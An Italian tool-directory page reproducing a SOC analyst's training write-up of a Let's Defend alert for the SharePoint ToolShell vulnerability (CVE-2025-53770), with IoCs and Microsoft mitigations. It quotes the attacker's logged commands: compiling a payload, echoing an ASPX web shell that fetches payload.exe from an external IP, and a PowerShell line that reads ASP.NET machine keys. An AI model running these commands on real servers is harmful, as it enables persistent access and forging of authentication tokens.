Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
-SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE — Un'attività per allenare le capacità di analisi e reporting | Kitploit
Strumenti/GitHubGitHub/bossnick98/-soc342---cve-2025-53770-sharepoint-toolshell-auth-bypass-and-rce
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebInformatica ForenseThreat IntelligenceApprendimento e FormazioneRisposta agli IncidentiLab e Pratica
GitHub
bossnick98/-soc342---cve-2025-53770-sharepoint-toolshell-auth-bypass-and-rce

-SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE

Un'attività per allenare le capacità di analisi e reporting

Vedi Repository
31 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE

Questa è un'indagine condotta sulla piattaforma Let's Defend, basata su una recente CVE di SharePoint. Diamo un'occhiata.

Immagine 2025-07-27 162109
  1. Esamina il nome della regola. I nomi delle regole sono solitamente creati specificamente per l'attacco da rilevare. Esaminando il nome della regola, puoi capire quale attacco stai affrontando.

La regola SOC342 ha rilevato una richiesta POST non autenticata rivolta alla pagina vulnerabile ToolPane.aspx, con le seguenti caratteristiche:

  • un payload di grandi dimensioni (Content-Length: 7699)

  • un referer sospetto (SignOut.aspx) probabilmente usato per offuscare l'origine

  • comportamento coerente con lo sfruttamento della vulnerabilità ToolShell

  1. Individua tra quali due dispositivi sta avvenendo il traffico.

Un utente esterno (IP: 107.191.58.76) ha inviato una richiesta appositamente predisposta a un server SharePoint interno (172.16.20.17).

Analizza il log del nostro endpoint

2

Un processo w3wp.exe che esegue un comando PowerShell codificato può indicare un potenziale exploit o un'attività post-exploitation (ad esempio, esecuzione di un payload nascosto).

In un ambiente SharePoint, è importante verificare se questo comportamento è atteso o se rappresenta un abuso.

Il comando è stato offuscato usando base64

Immagine 2025-07-27 163800

Questo payload consente all'attaccante di estrarre e stampare chiavi critiche di configurazione ASP.NET dalla macchina su cui viene eseguito.

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs

"C:\Windows\System32\cmd.exe" /c echo <form runat="server"> <object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11"><param name="Command" value="Redirect"> <param name="Button" value="Test"> <param name="Url" value="http://107.191.58.76/payload.exe\"> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx

Compila un eseguibile dal codice sorgente C# sul server.

Crea una backdoor web (file ASPX dannoso) nel percorso di SharePoint che, quando viene visitata, consente di eseguire o scaricare un payload esterno.

cmd.exe /c echo > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx

Questo comando crea un file chiamato spinstall0.aspx nella cartella LAYOUTS di SharePoint e vi scrive il contenuto (qui è un segnaposto che rappresenta il codice di una webshell).

Questo è l'hash di spinstall0.apx 92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514

Diamo un'occhiata su VirusTotal.

Immagine 2025-07-27 164912

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"

Questo comando consente all'attaccante di accedere alla configurazione dell'applicazione di MachineKeySection, che può esporre chiavi crittografiche sensibili come la chiave di convalida e la chiave di decrittografia.

Queste chiavi sono fondamentali per la sicurezza di ASP.NET, poiché proteggono elementi come i cookie di autenticazione e ViewState.

Esporre o recuperare queste chiavi può consentire agli attaccanti di forgiare token di autenticazione, decrittare dati protetti o eseguire altri attacchi contro l'applicazione web.

MITRE ATT&CK

mitre

Nota dell'analista:

L'avviso è stato generato a causa di un'insolita attività di PowerShell osservata su un server SharePoint, successivamente identificata come un tentativo di sfruttamento della CVE-2025-53770. L'attaccante ha inizialmente rilasciato e compilato un eseguibile C# personalizzato (payload.exe) usando il compilatore C# (csc.exe), quindi ha creato una webshell ASPX dannosa (spinstall0.aspx) all'interno di una directory di SharePoint accessibile via web. Successivamente, è stato eseguito un comando PowerShell per recuperare chiavi macchina crittografiche sensibili dalla configurazione del server tramite reflection .NET. Questa sequenza di azioni suggerisce un attacco multifase progettato per mantenere un controllo persistente e possibilmente forgiare token di autenticazione. La webshell è stata verificata come dannosa con un tasso di rilevamento VirusTotal di 39/62. L'incidente è confermato come vero positivo e si consigliano ulteriori misure di contenimento e bonifica.

Immagine 2025-07-27 170751

Dettaglio CVE-2025-53770

La deserializzazione di dati non attendibili in Microsoft SharePoint Server on-premises consente a un attaccante non autorizzato di eseguire codice su una rete. Microsoft è a conoscenza che esiste in natura un exploit per la CVE-2025-53770. Microsoft sta preparando e testando completamente un aggiornamento completo per risolvere questa vulnerabilità. Nel frattempo, assicurarsi che la mitigazione fornita nella documentazione di questa CVE sia attiva per essere protetti dallo sfruttamento.

Immagine 2025-07-27 171020

Mitigazione suggerita da Microsoft:

Per mitigare potenziali attacchi, i clienti dovrebbero:

  1. Utilizzare versioni supportate di SharePoint Server on-premises

  2. Applicare gli ultimi aggiornamenti di sicurezza collegati sopra.

  3. Distribuire Microsoft Defender for Endpoint, o soluzioni equivalenti per la protezione dalle minacce

  4. Assicurarsi che Antimalware Scan Interface (AMSI) sia attivato e configurato correttamente, con una soluzione antivirus appropriata come Defender Antivirus

  5. Ruotare le chiavi macchina ASP.NET di SharePoint Server

IoC

Spinstall0.aspx Web shell utilizzata dagli attori delle minacce

Gli attori hanno anche modificato il nome del file in vari modi, ad esempio spinstall.aspx, spinstall1.aspx, spinstall2.aspx

Questo report si basa su un'attività condotta sulla piattaforma Let's Defend. Tutti i risultati e i materiali presentati sono solo a scopo didattico. Tutti i diritti e la proprietà appartengono a Let's Defend.

Scarica lo strumento